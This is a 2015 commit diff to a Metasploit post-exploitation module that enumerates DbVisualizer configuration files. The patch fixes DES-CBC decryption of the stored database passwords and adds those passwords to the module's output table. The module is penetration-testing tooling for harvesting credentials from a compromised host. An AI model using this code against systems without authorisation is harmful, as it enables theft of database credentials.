Add decryption.final for proper padding

void-in · void-in · commit 3ac5088a9ac1 · 2015-05-29T10:33:55.000+05:00
diff --git a/modules/post/multi/gather/dbvis_enum.rb b/modules/post/multi/gather/dbvis_enum.rb
@@ -7,6 +7,7 @@
 require 'msf/core/auxiliary/report'
 require 'openssl'
 require 'digest/md5'
+require 'base64'
 
 class Metasploit3 < Msf::Post
 
@@ -204,7 +205,7 @@ def parse_new_config_file(raw_xml)
         report_host(:host =>  db[:Server]);
       end
 
-      db_table << [ db[:Alias], db[:Type], db[:Server], db[:Port], db[:Database], db[:Namespace], db[:Userid], db[:Password]]
+      db_table << [ db[:Alias], db[:Type], db[:Server], db[:Port], db[:Database], db[:Namespace], db[:Userid], db[:Password] ]
     end
     return db_table
   end
@@ -283,7 +284,7 @@ def parse_old_config_file(raw_xml)
           report_host(:host => $1.to_s)
         end
       end
-      db_table << [ db[:Alias] , db[:Type] , db[:Url], db[:Userid] ]
+      db_table << [ db[:Alias] , db[:Type] , db[:Url], db[:Userid], db[:Password] ]
     end
     return db_table
   end
@@ -301,10 +302,10 @@ def decrypt_password(enc_password)
     enc_password = Rex::Text.decode_base64(enc_password)
     dk, iv = get_derived_key
     des = OpenSSL::Cipher.new('DES-CBC')
+    des.decrypt
     des.key = dk
     des.iv = iv
-
-    des.update(enc_password)
+    password = des.update(enc_password) + des.final
   end
 
   def get_derived_key
